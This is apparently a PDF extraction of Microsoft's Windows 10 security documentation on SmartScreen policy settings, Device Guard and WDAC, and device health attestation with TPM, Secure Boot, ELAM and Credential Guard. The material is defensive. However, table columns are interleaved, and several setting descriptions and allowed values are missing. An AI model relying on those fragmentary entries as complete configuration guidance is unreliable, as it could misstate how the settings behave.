SmartScreen prompts for sites the warnings and continue to visit a
potentially malicious site.
Administrative Templates\Windows Internet Explorer 9 or later This policy setting prevents the
Components\Internet Explorer\Prevent employee from managing SmartScreen
managing SmartScreen Filter Filter.
If you enable this policy setting, the
employee isn't prompted to turn on
SmartScreen Filter. All website
addresses that are not on the filter's
allow list are sent automatically to
Microsoft without prompting the
employee.
If you disable or don't configure this
policy setting, the employee is
prompted to decide whether to
turn on SmartScreen Filter during
the first-run experience.
Administrative Templates\Windows Internet Explorer 8 or later This policy setting determines whether
Components\Internet Explorer\Prevent an employee can bypass warnings from
bypassing SmartScreen Filter warnings SmartScreen Filter.
If you enable this policy setting,
SmartScreen Filter warnings block
the employee.
policy setting, the employee can
bypass SmartScreen Filter warnings.
Administrative Templates\Windows Internet Explorer 9 or later This policy setting determines whether
Components\Internet Explorer\Prevent the employee can bypass warnings from
bypassing SmartScreen Filter warnings SmartScreen Filter. SmartScreen Filter
about files that are not commonly warns the employee about executable
downloaded from the Internet files that Internet Explorer users do not
commonly download from the Internet.
If you enable this policy setting,
SmartScreen Filter warnings block
the employee.
policy setting, the employee can
bypass SmartScreen Filter warnings.
MDM settings
If you manage your policies using Microsoft Intune, you'll want to use these MDM policy settings. All settings
support both desktop computers (running Windows 10 Pro or Windows 10 Enterprise, enrolled with Microsoft
Intune) and Windows 10 Mobile devices.
For SmartScreen Internet Explorer MDM policies, see Policy CSP - InternetExplorer.
SETTING SUPPORTED VERSIONS DETAILS
AllowSmartScreen Windows 10 URI full path.

./Vendor/MSFT/Policy/Config/Br
owser/AllowSmartScreen
Data type. Integer
Allowed values:
0 . Turns off Windows
Defender SmartScreen in
Edge.
1. Turns on Windows
Defender SmartScreen in
Edge.
EnableAppInstallControl Windows 10, version 1703 URI full path.

./Vendor/MSFT/Policy/Config/Sm
artScreen/EnableAppInstallContr
ol
Data type. Integer
Allowed values:
0 . Turns off Application
Installation Control,
allowing users to
download and install files
from anywhere on the
web.
1. Turns on Application
Installation Control,
allowing users to install
apps from the Microsoft
Store only.
EnableSmartScreenInShell Windows 10, version 1703 URI full path.

artScreen/EnableSmartScreenInS
hell
Data type. Integer
Allowed values:
0 . Turns off SmartScreen
in Windows for app and
file execution.
1. Turns on SmartScreen
in Windows for app and
file execution.
PreventOverrideForFilesInShell Windows 10, version 1703 URI full path.
artScreen/PreventOverrideForFil
esInShell
Data type. Integer
Allowed values:
0 . Employees can ignore
SmartScreen warnings
and run malicious files.
1. Employees can't ignore
SmartScreen warnings
and run malicious files.
PreventSmartScreenPromptOverride Windows 10, Version 1511 and later URI full path.
./Vendor/MSFT/Policy/Config/Br
owser/PreventSmartscreenProm
ptOverride
Data type. Integer
Allowed values:
SmartScreen warnings.
SmartScreen warnings.
PreventSmartScreenPromptOverrideFor Windows 10, Version 1511 and later URI full path.
Files ./Vendor/MSFT/Policy/Config/Br
owser/PreventSmartScreenProm
ptOverrideForFiles
Data type. Integer
Allowed values:
SmartScreen warnings for
files.
SmartScreen warnings for
files.
Recommended Group Policy and MDM settings for your organization

By default, Windows Defender SmartScreen lets employees bypass warnings. Unfortunately, this can let
employees continue to an unsafe site or to continue to download an unsafe file, even after being warned. Because
of this possibility, we strongly recommend that you set up Windows Defender SmartScreen to block high-risk
interactions instead of providing just a warning.
To better help you protect your organization, we recommend turning on and using these specific Windows
Defender SmartScreen Group Policy and MDM settings.
GROUP POLICY SETTING RECOMMENDATION
Administrative Templates\Windows Components\Microsoft Enable. Turns on Windows Defender SmartScreen.

Edge\Configure Windows Defender SmartScreen
Administrative Templates\Windows Components\Microsoft Enable. Stops employees from ignoring warning messages
Edge\Prevent bypassing Windows Defender SmartScreen and continuing to a potentially malicious website.
prompts for sites
Administrative Templates\Windows Components\Microsoft Enable. Stops employees from ingnoring warning messages
Edge\Prevent bypassing Windows Defender SmartScreen and continuing to download potentially malicious files.
prompts for files
Administrative Templates\Windows Components\File Enable with the Warn and prevent bypass option. Stops
Explorer\Configure Windows Defender SmartScreen employees from ignoring warning messages about malicious
files downloaded from the Internet.
MDM SETTING RECOMMENDATION
Browser/AllowSmartScreen 1. Turns on Windows Defender SmartScreen.
Browser/PreventSmartScreenPromptOverride 1. Stops employees from ignoring warning messages and

continuing to a potentially malicious website.
Browser/PreventSmartScreenPromptOverrideForFiles 1. Stops employees from ingnoring warning messages and

continuing to download potentially malicious files.
SmartScreen/EnableSmartScreenInShell 1. Turns on Windows Defender SmartScreen in Windows.

Requires at least Windows 10, version 1703.
SmartScreen/PreventOverrideForFilesInShell 1. Stops employees from ignoring warning messages about

malicious files downloaded from the Internet.
Requires at least Windows 10, version 1703.
Related topics
Threat protection
Windows Defender SmartScreen overview
Available Group Policy and Mobile Device Management (MDM ) settings for Microsoft Edge
NOTE
Set up and use Windows Defender SmartScreen on
individual devices
Applies to:
Windows 10, version 1703
Windows 10 Mobile
Windows Defender SmartScreen helps to protect your employees if they try to visit sites previously reported as
phishing or malware websites, or if an employee tries to download potentially malicious files.
How employees can use Windows Security to set up Windows

Defender SmartScreen
Starting with Windows 10, version 1703 your employees can use Windows Security to set up Windows Defender
SmartScreen for an individual device; unless you've used Group Policy or Microsoft Intune to prevent it.
NOTE
If any of the following settings are managed through Group Policy or mobile device management (MDM) settings, it appears
as unavailable to the employee.
To use Windows Security to set up Windows Defender SmartScreen on a device

1. Open the Windows Security app, and then click App & browser control.
2. In the App & browser control screen, choose from the following options:
In the Check apps and files area:
Block. Stops employees from downloading and running unrecognized apps and files from the
web.
Warn. Warns employees that the apps and files being downloaded from the web are
potentially dangerous, but allows the action to continue.
Off. Turns off SmartScreen, so an employee isn't alerted or stopped from downloading
potentially malicious apps and files.
In the SmartScreen for Microsoft Edge area:
Block. Stops employees from downloading and running unrecognized apps and files from the
web, while using Microsoft Edge.
Warn. Warns employees that sites and downloads are potentially dangerous, but allows the
action to continue while running in Microsoft Edge.
Off. Turns off SmartScreen, so an employee isn't alerted or stopped from downloading
potentially malicious apps and files.
In the SmartScreen from Microsoft Store apps area:
Warn. Warns employees that the sites and downloads used by Microsoft Store apps are
potentially dangerous, but allows the action to continue.
Off. Turns off SmartScreen, so an employee isn't alerted or stopped from visiting sites or from
downloading potentially malicious apps and files.
How SmartScreen works when an employee tries to run an app

Windows Defender SmartScreen checks the reputation of any web-based app the first time it's run from the
Internet, checking digital signatures and other factors against a Microsoft-maintained service. If an app has no
reputation or is known to be malicious, SmartScreen can warn the employee or block the app from running
entirely, depending on how you've configured the feature to run in your organization.
By default, your employees can bypass SmartScreen protection, letting them run legitimate apps after accepting a
warning message prompt. You can also use Group Policy or Microsoft Intune to block employees from using
unrecognized apps, or to entirely turn off Windows Defender SmartScreen (not recommended).
How employees can report websites as safe or unsafe

You can configure Windows Defender SmartScreen to warn employees from going to a potentially dangerous site.
Employees can then choose to report a website as safe from the warning message or as unsafe from within
Microsoft Edge and Internet Explorer 11.
To report a website as safe from the warning message
On the warning screen for the site, click More Information, and then click Report that this site does not
contain threats. The site info is sent to the Microsoft feedback site, which provides further instructions.
To report a website as unsafe from Microsoft Edge
If a site seems potentially dangerous, employees can report it to Microsoft by clicking More (...), clicking Send
feedback, and then clicking Report unsafe site.
To report a website as unsafe from Internet Explorer 11
If a site seems potentially dangerous, employees can report it to Microsoft by clicking on the Tools menu,
clicking Windows Defender SmartScreen, and then clicking Report unsafe website.
Related topics
Threat protection
Windows Defender SmartScreen overview
NOTE
Device Guard: Windows Defender Application
Control and virtualization-based protection of code
integrity
Applies to
Windows 10
Windows Server 2016
Windows 10 includes a set of hardware and OS technologies that, when configured together, allow enterprises to
"lock down" Windows systems so they operate with many of the properties of mobile devices. In this
configuration, specific technologies work together to restrict devices to only run authorized apps by using a feature
called configurable code integrity, while simultaneously hardening the OS against kernel memory attacks through
the use of virtualization-based protection of code integrity (more specifically, HVCI).
Configurable code integrity policies and HVCI are very powerful protections that can be used separately. However,
when these two technologies are configured to work together, they present a very strong protection capability for
Windows 10 devices. This combined "configuration state" of configurable code integrity and HVCI has been
referred to as Windows Defender Device Guard.
Using configurable code integrity to restrict devices to only authorized apps has these advantages over other
solutions:
1. Configurable code integrity policy is enforced by the Windows kernel itself. As such, the policy takes effect early
in the boot sequence before nearly all other OS code and before traditional antivirus solutions run.
2. Configurable code integrity allows customers to set application control policy not only over code running in
user mode, but also kernel mode hardware and software drivers and even code that runs as part of Windows.
3. Customers can protect the configurable code integrity policy even from local administrator tampering by
digitally signing the policy. This would mean that changing the policy would require both administrative
privilege and access to the organization’s digital signing process, making it extremely difficult for an attacker
with administrative privledge, or malicious software that managed to gain administrative privilege, to alter the
application control policy.
4. The entire configurable code integrity enforcement mechanism can be protected by HVCI, where even if a
vulnerability exists in kernel mode code, the likelihood that an attacker could successfully exploit it is
significantly diminished. Why is this relevant? That’s because an attacker that compromises the kernel would
otherwise have enough privilege to disable most system defenses and override the application control policies
enforced by configurable code integrity or any other application control solution.
(Re-)Introducing Windows Defender Application Control

When we originally designed the configuration state that we have referred to as Windows Defender Device Guard,
we did so with a specific security promise in mind. Although there were no direct dependencies between the two
main OS features of the Device Guard configuration, configurable code integrity and HVCI, we intentionally
focused our discussion around the Device Guard lockdown state you achieve when deploying them together.
However, the use of the term Device Guard to describe this configuration state has unintentionally left an
impression for many IT professionals that the two features were inexorably linked and could not be deployed
separately. Additionally, given that HVCI relies on Windows virtualization-based security, it comes with additional
hardware, firmware, and kernel driver compatibility requirements that some older systems can’t meet.
As a result, many IT Professionals assumed that because some systems couldn't use HVCI, they couldn’t use
configurable code integrity either. But configurable code integrity carries no specific hardware or software
requirements other than running Windows 10, which means many IT professionals were wrongly denied the
benefits of this powerful application control capability.
Since the initial release of Windows 10, the world has witnessed numerous hacking and malware attacks where
application control alone could have prevented the attack altogether. With this in mind, we are discussing and
documenting configurable code integrity as a independent technology within our security stack and giving it a
name of its own: Windows Defender Application Control. We hope this change will help us better communicate
options for adopting application control within an organization.
Does this mean Windows Defender Device Guard configuration state is going away? Not at all. The term Device
Guard will continue to be used as a way to describe the fully locked down state achieved through the use of
Windows Defender Application Control (WDAC ), HVCI, and hardware and firmware security features. It also
allows us to work with our OEM partners to identify specifications for devices that are “Device Guard capable” so
that our joint customers can easily purchase devices that meet all of the hardware and firmware requirements of
the original "Device Guard" locked down scenario for Windows 10 based devices.
Related topics
Dropping the Hammer Down on Malware Threats with Windows 10’s Windows Defender Device Guard
Driver compatibility with Windows Defender Device Guard in Windows 10
Code integrity
Control the health of Windows 10-based devices
Applies to
Windows 10
This article details an end-to-end solution that helps you protect high-value assets by enforcing, controlling, and
reporting the health of Windows 10-based devices.
Introduction
In Bring Your Own Device (BYOD ) scenarios, employees bring commercially available devices to access both work-
related resources and their personal data. Users want to use the device of their choice to access the organization’s
applications, data, and resources not only from the internal network but also from anywhere. This phenomenon is
also known as the consumerization of IT.
Users want to have the best productivity experience when accessing corporate applications and working on
organization data from their devices. That means they will not tolerate being prompted to enter their work
credentials each time they access an application or a file server. From a security perspective, it also means that
users will manipulate corporate credentials and corporate data on unmanaged devices.
With the increased use of BYOD, there will be more unmanaged and potentially unhealthy systems accessing
corporate services, internal resources, and cloud apps.
Even managed devices can be compromised and become harmful. Organizations need to detect when security has
been breached and react as early as possible in order to protect high-value assets.
As Microsoft moves forward, security investments are increasingly focused on security preventive defenses and
also on detection and response capabilities.
Windows 10 is an important component of an end-to-end security solution that focuses not only on the
implementation of security preventive defenses, but adds device health attestation capabilities to the overall
security strategy.
Description of a robust end-to-end security solution

Today’s computing threat landscape is increasing at a speed never encountered before. The sophistication of
criminal attacks is growing, and there is no doubt that malware now targets both consumers and professionals in
all industries.
During recent years, one particular category of threat has become prevalent: advanced persistent threats (APTs).
The term APT is commonly used to describe any attack that seems to target individual organizations on an on-
going basis. In fact, this type of attack typically involves determined adversaries who may use any methods or
techniques necessary.
With the BYOD phenomena, a poorly maintained device represents a target of choice. For an attacker, it’s an easy
way to breach the security network perimeter, gain access to, and then steal high-value assets.
The attackers target individuals, not specifically because of who they are, but because of who they work for. An
infected device will bring malware into an organization, even if the organization has hardened the perimeter of
networks or has invested in its defensive posture. A defensive strategy is not sufficient against these threats.
A different approach
Rather than the traditional focus on the prevention of compromise, an effective security strategy assumes that
determined adversaries will successfully breach any defenses. It means that it’s necessary to shift focus away from
preventative security controls to detection of, and response to, security issues. The implementation of the risk
management strategy, therefore, balances investment in prevention, detection, and response.
Because mobile devices are increasingly being used to access corporate information, some way to evaluate device
security or health is required. This section describes how to provision device health assessment in such a way that
high-value assets can be protected from unhealthy devices.
Devices that are used to access corporate resources must be trusted. An efficient end-to-end security approach is
able to evaluate device health and use the current security state when granting access to a high-value asset.
A robust design needs to establish the user’s identity, strengthen the authentication method if needed, and learn
behavior like the network location the user regularly connects from. Also, a modern approach must be able to
release sensitive content only if user devices are determined to be healthy and secure.
The following figure shows a solution built to assess device health from the cloud. The device authenticates the
user through a connection to an identity provider in the cloud. If the managed asset contains highly confidential
information, the conditional access engine of the identity provider may elect to verify the security compliance of the
mobile device before access is granted. The user’s device is able to prove its health status that can be sent at any
time or when mobile device management (MDM ) requests it.
Windows devices can be protected from low -level rootkits and bootkits by using low -level hardware technologies
such as Unified Extensible Firmware Interface (UEFI) Secure Boot.
Secure Boot is a firmware validation process that helps prevent rootkit attacks; it is part of the UEFI specification.
The intent of UEFI is to define a standard way for the operating system to communicate with modern hardware,
which can perform faster and with more efficient input/output (I/O ) functions than older, software interrupt-driven
BIOS systems.
A device health attestation module can communicate measured boot data that is protected by a Trusted Platform
Module (TPM ) to a remote service. After the device successfully boots, boot process measurement data is sent to a
trusted cloud service (Health Attestation Service) using a more secure and tamper-resistant communication
channel.
Remote health attestation service performs a series of checks on the measurements. It validates security related
data points, including boot state (Secure Boot, Debug Mode, and so on), and the state of components that manage
security (BitLocker, Device Guard, and so on). It then conveys the health state of the device by sending a health
encrypted blob back to the device.
An MDM solution typically applies configuration policies and deploys software to devices. MDM defines the
security baseline and knows the level of compliance of the device with regular checks to see what software is
installed and what configuration is enforced, as well as determining the health status of the device.
An MDM solution asks the device to send device health information and forward the health encrypted blob to the
remote health attestation service. The remote health attestation service verifies device health data, checks that
MDM is communicating to the same device, and then issues a device health report back to the MDM solution.
An MDM solution evaluates the health assertions and, depending on the health rules belonging to the
organization, can decide if the device is healthy. If the device is healthy and compliant, MDM passes that
information to the identity provider so the organization’s access control policy can be invoked to grant access.
Access to content is then authorized to the appropriate level of trust for whatever the health status and other
conditional elements indicate.
Depending on the requirements and the sensitivity of the managed asset, device health status can be combined
with user identity information when processing an access request. Access to content is then authorized to the
appropriate level of trust. The Conditional Access engine may be structured to allow additional verification as
needed by the sensitivity of the managed asset. For example, if access to high-value data is requested, additional
security authentication may need to be established by querying the user to answer a phone call before access is
granted.
Microsoft’s security investments in Windows 10
In Windows 10, there are three pillars of investments:
Secure identities. Microsoft is part of the FIDO Alliance which aims to provide an interoperable method of
secure authentication by moving away from the use of passwords for authentication, both on the local system
as well as for services like on-premises resources and cloud resources.
Information protection. Microsoft is making investments to allow organizations to have better control over
who has access to important data and what they can do with that data. With Windows 10, organizations can
take advantage of policies that specify which applications are considered to be corporate applications and can
be trusted to access secure data.
Threat resistance. Microsoft is helping organizations to better secure enterprise assets against the threats of
malware and attacks by using security defenses relying on hardware.
Protect, control, and report on the security status of Windows 10-based devices
This section is an overview that describes different parts of the end-to-end security solution that helps protect
high-value assets and information from attackers and malware.
NUMBER PART OF THE SOLUTION DESCRIPTION
1 Windows 10-based device The first time a Windows 10-based

device is powered on, the out-of-box
experience (OOBE) screen is displayed.
During setup, the device can be
automatically registered into Azure
Active Directory (AD) and enrolled in
MDM.
A Windows 10-based device with TPM
can report health status at any time by
using the Health Attestation Service
available with all editions of Windows
10.
2 Identity provider Azure AD contains users, registered

devices, and registered application of
organization’s tenant. A device always
belongs to a user and a user can have
multiple devices. A device is represented
as an object with different attributes like
the compliance status of the device. A
trusted MDM can update the
compliance status.
Azure AD is more than a repository.
Azure AD is able to authenticate users
and devices and can also authorize
access to managed resources. Azure AD
has a conditional access control engine
that leverages the identity of the user,
the location of the device and also the
compliance status of the device when
making a trusted access decision.
3 Mobile device management Windows 10 has MDM support that

enables the device to be managed out-
of-box without deploying any agent.
MDM can be Microsoft Intune or any
third-party MDM solution that is
compatible with Windows 10.
4 Remote health attestation The Health Attestation Service is a

trusted cloud service operated by
Microsoft that performs a series of
health checks and reports to MDM
what Windows 10 security features are
enabled on the device.
Security verification includes boot state
(WinPE, Safe Mode, Debug/test modes)
and components that manage security
and integrity of runtime operations
(BitLocker, Device Guard).
5 Enterprise managed asset Enterprise managed asset is the

resource to protect.
For example, the asset can be Office
365, other cloud apps, on-premises web
resources published by Azure AD, or
even VPN access.
The combination of Windows 10-based devices, identity provider, MDM, and remote health attestation creates a
robust end-to-end-solution that provides validation of health and compliance of devices that access high-value
assets.
Protect devices and enterprise credentials against threats

This section describes what Windows 10 offers in terms of security defenses and what control can be measured
and reported to.
Windows 10 hardware -based security defenses
The most aggressive forms of malware try to insert themselves into the boot process as early as possible so that
they can take control of the operating system early and prevent protection mechanisms and antimalware software
from working. This type of malicious code is often called a rootkit or bootkit. The best way to avoid having to deal
with low -level malware is to secure the boot process so that the device is protected from the very start. Windows
10 supports multiple layers of boot protection. Some of these features are available only if specific types of
hardware are installed. For more information, see the Hardware requirements section.
Windows 10 supports features to help prevent sophisticated low -level malware like rootkits and bootkits from
loading during the startup process:
Trusted Platform Module. A Trusted Platform Module (TPM ) is a hardware component that provides
unique security features.
Windows 10 leverages security characteristics of a TPM for measuring boot integrity sequence (and based
on that, unlocking automatically BitLocker protected drives), for protecting credentials or for health
attestation.
A TPM implements controls that meet the specification described by the Trusted Computing Group (TCG ).
At the time of this writing, there are two versions of TPM specification produced by TCG that are not
compatible with each other:
The first TPM specification, version 1.2, was published in February 2005 by the TCG and standardized
under ISO / IEC 11889 standard.
The latest TPM specification, referred to as TPM 2.0, was released in April 2014 and has been approved
by the ISO/IEC Joint Technical Committee (JTC ) as ISO/IEC 11889:2015.
Windows 10 uses the TPM for cryptographic calculations as part of health attestation and to protect the
keys for BitLocker, Windows Hello, virtual smart cards, and other public key certificates. For more
information, see TPM requirements in Windows 10.
Windows 10 recognizes versions 1.2 and 2.0 TPM specifications produced by the TCG. For the most recent
and modern security features, Windows 10 supports only TPM 2.0.
TPM 2.0 provides a major revision to the capabilities over TPM 1.2:
Update crypto strength to meet modern security needs
Support for SHA-256 for PCRs
Support for HMAC command
Cryptographic algorithms flexibility to support government needs
TPM 1.2 is severely restricted in terms of what algorithms it can support
TPM 2.0 can support arbitrary algorithms with minor updates to the TCG specification documents
Consistency across implementations
The TPM 1.2 specification allows vendors wide latitude when choosing implementation details
TPM 2.0 standardizes much of this behavior
Secure Boot. Devices with UEFI firmware can be configured to load only trusted operating system
bootloaders. Secure Boot does not require a TPM.
The most basic protection is the Secure Boot feature, which is a standard part of the UEFI 2.2+ architecture.
On a PC with conventional BIOS, anyone who can take control of the boot process can boot by using an
alternative OS loader, and potentially gain access to system resources. When Secure Boot is enabled, you
can boot using only an OS loader that’s signed using a certificate stored in the UEFI Secure Boot DB.
Naturally, the Microsoft certificate used to digitally sign the Windows 10 OS loaders are in that store, which
allows UEFI to validate the certificate as part of its security policy. Secure Boot must be enabled by default
on all computers that are certified for Windows 10 under the Windows Hardware Compatibility Program.
Secure Boot is a UEFI firmware-based feature, which allows for the signing and verification of critical boot
files and drivers at boot time. Secure Boot checks signature values of the Windows Boot Manager, BCD
store, Windows OS loader file, and other boot critical DLLs at boot time before the system is allowed to fully
boot into a usable operating system by using policies that are defined by the OEM at build time. Secure
Boot prevents many types of boot-based rootkit, malware, and other security-related attacks against the
Windows platform. Secure Boot protects the operating system boot process whether booting from local
hard disk, USB, PXE, or DVD, or into full Windows or Windows Recovery Environment (RE ). Secure Boot
protects the boot environment of a Windows 10 installation by verifying the signatures of the critical boot
components to confirm malicious activity did not compromise them. Secure Boot protection ends after the
Windows kernel file (ntoskrnl.exe) has been loaded.
Note: Secure Boot protects the platform until the Windows kernel is loaded. Then protections like
ELAM take over.
Secure Boot configuration policy. Extends Secure Boot functionality to critical Windows 10
configuration.
Examples of protected configuration information include protecting Disable Execute bit (NX option) or
ensuring that the test signing policy (code integrity) cannot be enabled. This ensures that the binaries and
configuration of the computer can be trusted after the boot process has completed. Secure Boot
configuration policy does this with UEFI policy. These signatures for these policies are signed in the same
way that operating system binaries are signed for use with Secure Boot.
The Secure Boot configuration policy must be signed by a private key that corresponds to one of the public
keys stored in the Key Exchange Key (KEK) list. The Microsoft Certificate Authority (CA) will be present in the
KEK list of all Windows certified Secure Boot systems. By default, a policy signed by the Microsoft KEK shall
be work on all Secure Boot systems. BootMgr must verify the signature against the KEK list before applying
a signed policy. With Windows 10, the default Secure Boot configuration policy is embedded in bootmgr.
The bootloader verifies the digital signature of the Windows 10 kernel before loading it. The Windows 10
kernel, in turn, verifies every other component of the Windows startup process, including the boot drivers,
startup files, and the ELAM component. This step is important and protects the rest of the boot process by
verifying that all Windows boot components have integrity and can be trusted.
Early Launch Antimalware (ELAM ). ELAM tests all drivers before they load and prevents unapproved
drivers from loading.
Traditional antimalware apps don’t start until after the boot drivers have been loaded, which gives a rootkit
that is disguised as a driver the opportunity to work. ELAM is a Windows mechanism introduced in a
previous version of Windows that allows antimalware software to run very early in the boot sequence. Thus,
the antimalware component is the first third-party component to run and control the initialization of other
boot drivers until the Windows operating system is operational. When the system is started with a complete
runtime environment (network access, storage, and so on), then a full-featured antimalware is loaded.
ELAM can load a Microsoft or non-Microsoft antimalware driver before all non-Microsoft boot drivers and
applications, thus continuing the chain of trust established by Secure Boot and Trusted Boot. Because the
operating system hasn’t started yet, and because Windows needs to boot as quickly as possible, ELAM has a
simple task: Examine every boot driver and determine whether it is on the list of trusted drivers. If it’s not
trusted, Windows won’t load it.
Note: Windows Defender, Microsoft's antimalware included by default in Windows 10, supports ELAM;
it can be replaced with a third-party antimalware compatible solution. The name of the Windows
Defender ELAM driver is WdBoot.sys. Windows Defender in Windows 10 uses its ELAM driver to roll
back any malicious changes made to the Windows Defender driver at the next reboot. This prevents
kernel mode malware making lasting changes to Windows Defender’s mini-filter driver before
shutdown or reboot.
The ELAM signed driver is loaded before any other third-party drivers or applications, which allows the
antimalware software to detect and block any attempts to tamper with the boot process by trying to load
unsigned or untrusted code.
The ELAM driver is a small driver with a small policy database that has a very narrow scope, focused on
drivers that are loaded early at system launch. The policy database is stored in a registry hive that is also
measured to the TPM, to record the operational parameters of the ELAM driver. An ELAM driver must be
signed by Microsoft and the associated certificate must contain the complementary EKU
(1.3.6.1.4.1.311.61.4.1).
Virtualization-based security (Hyper-V + Secure Kernel). Virtualization-based security is a completely
new enforced security boundary that allows you to protect critical parts of Windows 10.
Virtualization-based security isolates sensitive code like Kernel Mode Code Integrity or sensitive corporate
domain credentials from the rest of the Windows operating system. For more information, refer to the
Virtualization-based security section.
Hypervisor-protected Code Integrity (HVCI ). Hypervisor-protected Code Integrity is a feature of Device
Guard that ensures only drivers, executables, and DLLs that comply with the Device Guard Code Integrity
policy are allowed to run.
When enabled and configured, Windows 10 can start the Hyper-V virtualization-based security services.
HVCI helps protect the system core (kernel), privileged drivers, and system defenses, like antimalware
solutions, by preventing malware from running early in the boot process, or after startup.
HVCI uses virtualization-based security to isolate Code Integrity, the only way kernel memory can become
executable is through a Code Integrity verification. This means that kernel memory pages can never be
Writable and Executable (W+X) and executable code cannot be directly modified.
Note: Device Guard devices that run Kernel Mode Code Integrity with virtualization-based security
must have compatible drivers. For additional information, please read the Driver compatibility with
Device Guard in Windows 10 blog post.
The Device Guard Code Integrity feature lets organizations control what code is trusted to run into the
Windows kernel and what applications are approved to run in user mode. It’s configurable by using a policy.
Device Guard Code Integrity policy is a binary file that Microsoft recommends you sign. The signing of the
Code Integrity policy aids in the protection against a malicious user with Administrator privileges trying to
modify or remove the current Code Integrity policy.
Credential Guard. Credential Guard protects corporate credentials with hardware-based credential
isolation.
In Windows 10, Credential Guard aims to protect domain corporate credentials from theft and reuse by
malware. With Credential Guard, Windows 10 implemented an architectural change that fundamentally
prevents the current forms of the pass-the-hash (PtH) attack.
This is accomplished by leveraging Hyper-V and the new virtualization-based security feature to create a
protected container where trusted code and secrets are isolated from the Windows kernel. That means that
even if the Windows kernel is compromised an attacker has no way to read and extract the data required to
initiate a PtH attack. Credential Guard prevents this because the memory where secrets are stored is no
longer accessible from the regular OS, even in kernel mode - the hypervisor controls who can access the
memory.
Health attestation. The device’s firmware logs the boot process, and Windows 10 can send it to a trusted
server that can check and assess the device’s health.
Windows 10 takes measurements of the UEFI firmware and each of the Windows and antimalware
components are made as they load during the boot process. Additionally, they are taken and measured
sequentially, not all at once. When these measurements are complete, their values are digitally signed and
stored securely in the TPM and cannot be changed unless the system is reset.
For more information, see Secured Boot and Measured Boot: Hardening Early Boot Components Against
Malware.
During each subsequent boot, the same components are measured, which allows comparison of the
measurements against an expected baseline. For additional security, the values measured by the TPM can be
signed and transmitted to a remote server, which can then perform the comparison. This process, called
remote device health attestation, allows the server to verify health status of the Windows device.
Although Secure Boot is a proactive form of protection, health attestation is a reactive form of boot
protection. Health attestation ships disabled in Windows and is enabled by an antimalware or an MDM
vendor. Unlike Secure Boot, health attestation will not stop the boot process and enter remediation when a
measurement does not work. But with conditional access control, health attestation will help to prevent
access to high-value assets.
Virtualization-based security
Virtualization-based security provides a new trust boundary for Windows 10. leverages Hyper-V hypervisor
technology to enhance platform security. Virtualization-based security provides a secure execution environment to
run specific Windows trusted code (trustlet) and to protect sensitive data.
Virtualization-based security helps to protect against a compromised kernel or a malicious user with Administrator
privileges. Note that virtualization-based security is not trying to protect against a physical attacker.
The following Windows 10 services are protected with virtualization-based security:
Credential Guard (LSA Credential Isolation): prevents pass-the-hash attacks and enterprise credential theft
that happens by reading and dumping the content of lsass memory
Device Guard (Hyper-V Code Integrity): Device Guard uses the new virtualization-based security in Windows
10 to isolate the Code Integrity service from the Windows kernel itself, which lets the service use signatures
defined by your enterprise-controlled policy to help determine what is trustworthy. In effect, the Code Integrity
service runs alongside the kernel in a Windows hypervisor-protected container.
Other isolated services: for example, on Windows Server 2016, there is the vTPM feature that allows you to
have encrypted virtual machines (VMs) on servers.
Note: Virtualization-based security is only available with Windows 10 Enterprise. Virtualization-based security
requires devices with UEFI (2.3.1 or higher) with Secure Boot enabled, x64 processor with Virtualization
Extensions and SLAT enabled. IOMMU, TPM 2.0. and support for Secure Memory overwritten are optional,
but recommended.
The schema below is a high-level view of Windows 10 with virtualization-based security.
Credential Guard
In Windows 10, when Credential Guard is enabled, Local Security Authority Subsystem Service (lsass.exe) runs
sensitive code in an Isolated user mode to help protect data from malware that may be running in the normal user
mode. This helps ensure that protected data is not stolen and reused on remote machines, which mitigates many
PtH-style attacks.
Credential Guard helps protect credentials by encrypting them with either a per-boot or persistent key:
The per-boot key is used for any in-memory credentials that do not require persistence. An example of such a
credential would be a ticket-granting ticket (TGT) session key. This key is negotiated with a Key Distribution
Center (KDC ) every time authentication occurs and is protected with a per-boot key.
The persistent key, or some derivative, is used to help protect items that are stored and reloaded after a
reboot. Such protection is intended for long-term storage, and must be protected with a consistent key.
Credential Guard is activated by a registry key and then enabled by using an UEFI variable. This is done to
protect against remote modifications of the configuration. The use of a UEFI variable implies that physical
access is required to change the configuration. When lsass.exe detects that credential isolation is enabled, it then
spawns LsaIso.exe as an isolated process, which ensures that it runs within isolated user mode. The startup of
LsaIso.exe is performed before initialization of a security support provider, which ensures that the secure mode
support routines are ready before any authentication begins.
Device Guard
Device Guard is a new feature of Windows 10 Enterprise that allows organizations to lock down a device to help
protect it from running untrusted software. In this configuration, the only applications allowed to run are those that
are trusted by the organization.
The trust decision to execute code is performed by using Hyper-V Code Integrity, which runs in virtualization-
based security, a Hyper-V protected container that runs alongside regular Windows.
Hyper-V Code Integrity is a feature that validates the integrity of a driver or system file each time it is loaded into
memory. Code integrity detects whether an unsigned driver or system file is being loaded into the kernel, or
whether a system file has been modified by malicious software that is being run by a user account with
Administrator privileges. On x64-based versions of Windows 10 kernel-mode drivers must be digitally signed.
Note: Independently of activation of Device Guard Policy, Windows 10 by default raises the bar for what runs
in the kernel. Windows 10 drivers must be signed by Microsoft, and more specifically, by the WHQL (Windows
Hardware Quality Labs) portal. Additionally, starting in October 2015, the WHQL portal will only accept driver
submissions, including both kernel and user mode driver submissions, that have a valid Extended Validation
(“EV”) Code Signing Certificate.
With Device Guard in Windows 10, organizations are now able to define their own Code Integrity policy for use on
x64 systems running Windows 10 Enterprise. Organizations have the ability to configure the policy that determines
what is trusted to run. These include drivers and system files, as well as traditional desktop applications and scripts.
The system is then locked down to only run applications that the organization trusts.
Device Guard is a built-in feature of Windows 10 Enterprise that prevents the execution of unwanted code and
applications. Device Guard can be configured using two rule actions - allow and deny:
Allow limits execution of applications to an allowed list of code or trusted publisher and blocks everything else.
Deny completes the allow trusted publisher approach by blocking the execution of a specific application.
At the time of this writing, and according to Microsoft’s latest research, more than 90 percent of malware is
unsigned completely. So implementing a basic Device Guard policy can simply and effectively help block the vast
majority of malware. In fact, Device Guard has the potential to go further, and can also help block signed malware.
Device Guard needs to be planned and configured to be truly effective. It is not just a protection that is enabled or
disabled. Device Guard is a combination of hardware security features and software security features that, when
configured together, can lock down a computer to help ensure the most secure and resistant system possible.
There are three different parts that make up the Device Guard solution in Windows 10:
The first part is a base set of hardware security features introduced with the previous version of Windows.
TPM for hardware cryptographic operations and UEFI with modern firmware, along with Secure Boot, allows
you to control what the device is running when the systems start.
After the hardware security feature, there is the code integrity engine. In Windows 10, Code Integrity is now
fully configurable and now resides in Isolated user mode, a part of the memory that is protected by
virtualization-based security.
